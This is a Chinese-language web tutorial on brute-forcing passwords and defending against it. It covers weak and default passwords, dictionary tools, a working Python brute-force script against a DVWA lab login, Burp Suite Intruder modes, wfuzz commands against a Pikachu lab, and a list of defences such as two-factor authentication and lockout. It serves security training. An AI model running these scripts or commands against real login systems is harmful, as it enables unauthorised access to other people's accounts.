700字范文,内容丰富有趣,生活中的好帮手!
700字范文 > 密码暴力破解与防御

密码暴力破解与防御

时间:2020-10-08 22:03:44

相关推荐

密码暴力破解与防御

密码暴力破解与防御

密码安全概述漏洞利用权限管理不安全的密码默认密码弱口令裤子密码猜解思路字典专门字典python暴力破解Burp Suite暴力破解LowMediumHighBp其他攻击模式Impossible如何防御暴力破解其他暴力破解工具wfuzzpiachuHydraMudusaMSF

密码安全概述

加密、完整性、身份认证

存储安全、传输安全、输入安全

漏洞利用

从数据库获取密码

窃听通信数据

直接从登录框猜测数据

权限管理

认证:你是谁?

授权:你能做什么?

不安全的密码

默认密码

000000

123456

空密码

身份证后六位

手机后六位

弱口令

裤子

已经泄漏的密码

密码猜解思路

猜测范围

密码长度

密码内容

APP密码范围

字典

kali字典存放路径

专门字典

【1】指定格式的字典,比如生日、手机号、QQ号

crunch -h

【2】社工字典

cupp、ccupp

【3】文章内容字典

cewl -w dict.txt

python暴力破解

从字典取其值,生成密码

# -*- coding: utf-8 -*-# python 3pwds = open("password.txt")for pwd in pwds:print(pwd)pwds.close()

HTTP连接到需要爆破的地址

# -*- coding: utf-8 -*-# python 3import requests# 如果第一个密码就提示成功,是 PHPSESSID 没有替换的问题pwds = open("password.txt")for pwd in pwds:url = "http://localhost/dvwa/vulnerabilities/brute/"# PHPSESSID务必替换为登录以后的PHPSESSIDresp = requests.get(url = url, params = {"username":"admin", "password":pwd.strip(), "Login":"Login"}, headers = {"Cookie":"security=low; PHPSESSID=sm7bdfe4r6c03ai9682timdlu1"})#print(resp.text)if 'Username and/or password incorrect.' in resp.text:print('破解失败:'+pwd, end='')else:print('破解成功:'+pwd, end='')break;pwds.close()

安装requests

获得HTTP响应,分析响应结果,看看有没有错误提示

如果有提示,就继续下一次循环

如果没有,就继续下一次循环

Burp Suite暴力破解

Low

设置好代理

抓包成功

使用intruder模式

选择模式,选择攻击的字段

导入密码字典

开始攻击

攻击完成,单击排序

查看length最长即为密码

Medium

做了一个延迟,影响很小

High

抓包

设置intruder

Bp其他攻击模式

攻城锤:所有字段都一样

草叉:可以选择两个字段,并分别设置字典

榴霰弹:两个字典可以交叉匹配

Impossible

限制猜解的时间和次数

如何防御暴力破解

【1】 二次验证

【2】限制次数,锁定账户

【3】WAF

【4】IP验证

【5】行为识别,异地登录

【6】强制修改密码

【7】取消密码注册

其他暴力破解工具

wfuzz

piachu

wfuzz -z file,user -z file,pass -d “username=FUZZ&password=FUZ2Z&submit=login” http://192.168.202.139/pikachu/vul/burteforce/bf_form.php

wfuzz -z file,user -z file,pass --hw 1797 -d “username=FUZZ&password=FUZ2Z&submit=login” http://192.168.202.139/pikachu/vul/burteforce/bf_form.php

Hydra

Mudusa

MSF

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。